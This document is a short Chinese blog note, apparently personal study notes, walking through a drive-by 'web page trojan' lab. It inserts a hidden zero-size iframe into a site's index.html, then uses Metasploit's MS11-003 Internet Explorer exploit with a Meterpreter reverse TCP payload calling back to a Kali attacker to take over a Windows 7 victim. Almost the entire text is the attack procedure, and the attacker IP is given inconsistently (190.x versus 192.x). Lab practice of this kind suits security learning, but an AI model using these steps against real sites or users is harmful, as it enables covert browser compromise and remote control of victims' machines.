浏览器安全之网页挂马实战(笔记)

                                                                             浏览器安全之网页挂马实战(笔记)————用于自己记录学习用

实验环境

受害机:Windows7

攻击机:Kali Linux    IP:190.168.221.133

实验步骤

步骤一

1.打开/var/www/html,使用命令ls找到index.html,用vim打开文件

 

2.把代码插进index.html中:

<iframe src=地址 width=0 height=0></iframe>

步骤二

1.在Kali中启动msfconsole

2.运行命令use exploit/windows/browser/ms11_003_ie_css_import

3.运行命令show options

4.执行命令:set SRVPORT 8060

5.执行命令:set URIPATH test.html

6.运行命令 set payload windows/meterpreter/reverse_tcp

7.运行命令show options

 8.命令 set lhost 192.168.221.133

9.运行命令run,开始攻击

 步骤三

1.在Kali上开启apache服务,service apache2 start

 2.Windows机:打开IE浏览器,访问http://192.168.221.133/index.html

 3.在Kali中可以看到受害机成功上线,成功获取到会话记录

 5.Windows机关闭IE浏览器,Kali中 Ctrl+C 退出连接状态

6.运行命令sessions

7.运行命令 sessions -i 1

8.输入sysinfo命令,查看靶机的相关信息:

 

posted @ 2021-07-08 10:05  啦啦lll  阅读(887)  评论(0)    收藏  举报
/*
*/